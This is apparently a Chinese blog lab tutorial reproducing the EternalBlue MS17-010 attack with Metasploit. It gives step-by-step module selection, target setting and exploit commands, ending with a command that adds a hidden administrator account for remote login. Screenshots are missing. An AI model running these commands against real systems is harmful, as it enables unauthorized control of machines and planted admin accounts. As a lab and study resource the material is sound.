天天看点

永恒之蓝

前言——

需要一台有ms17010 和一台kali 

ps:需要在同一局域网内,可以相互ping通

漏洞简介:

   永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

复现过程:

1,在kali下,如果不是root权限,需要提权,如果是,跳过这一步

命令:sudo su

          sudo -i                   这两个都可以

永恒之蓝

2, 启动msf:msfconsole

永恒之蓝

ps:输入命令后的图像随机,不必纠结这一点

3,搜索模块: search ms17_010

永恒之蓝

ps:关于以上模块,简单解释一下

0 auxiliary/admin/smb/ms17_010_command      //扫描445在线主机 MS17_010漏洞利用需要开放445 smb服务

1 auxiliary/scanner/smb/smb_ms17_010   //扫描模块,扫描目标主机是否存在永恒之蓝漏洞

2 exploit/windows/smb/ms17_010_eternalblue    //攻击模块

3 exploit/windows/smb/ms17_010_eternalblue_win8   //攻击模块,针对win8(个人猜测)

4 exploit/windows/smb/ms17_010_psexec     //可以理解成没得用

4,建立监听器:use exploit/multi/handler

永恒之蓝

5,使用扫描模块:use auxiliary/scanner/smb/smb_ms17_010

ps:也可以使用前面的序号,这里为了偷懒,就使用前面的序号了:use 1

永恒之蓝

show options   //查看

永恒之蓝

ps:required中显示yes的需要补充完整

所以使用命令补充ip地址:set RHOSTS 192.168.3.135(目标ip)

永恒之蓝

6,exploit  //扫描是否有漏洞

ps:run也可以(这里就不展示了,但是建议用exploit)

永恒之蓝

扫描查看是否存在永恒之蓝这个漏洞,当然这里这里肯定是有的(没有的话就可以换方法了)

7,使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue(use 2)

查看模块(show options)

设置ip(set RHOSTS 192.168.3.135)

永恒之蓝

8,尝试攻击:exploit

人类的悲欢并不相同,永恒蓝屏(反正我用这个是没有成功的,本来还想要测试一下有杀软的情况,但是现实不允许啊)

参考有杀软的教程: ​​javascript:void(0)​​

另:如果成功,之后的步骤及一些命令

永恒之蓝

如果成功,会现实win

永恒之蓝

蓝屏....

9,在刚刚exploit命令无法成功后,使用模块:use auxiliary/admin/smb/ms17_010_command (use 0)

一样的步骤,查看,设置(注意:yes的都要添加,不要漏掉)

永恒之蓝

10,exploit运行成功后,可以看到用户已经加进去了

永恒之蓝
永恒之蓝

11,加入后可以通过远程连接,拿到shell

永恒之蓝

ps:存在问题:不允许交互式登录

永恒之蓝

更改权限:set COMMAND net localgroup administrators hhh /add

永恒之蓝

成功添加用户

永恒之蓝

成功上线

永恒之蓝

继续阅读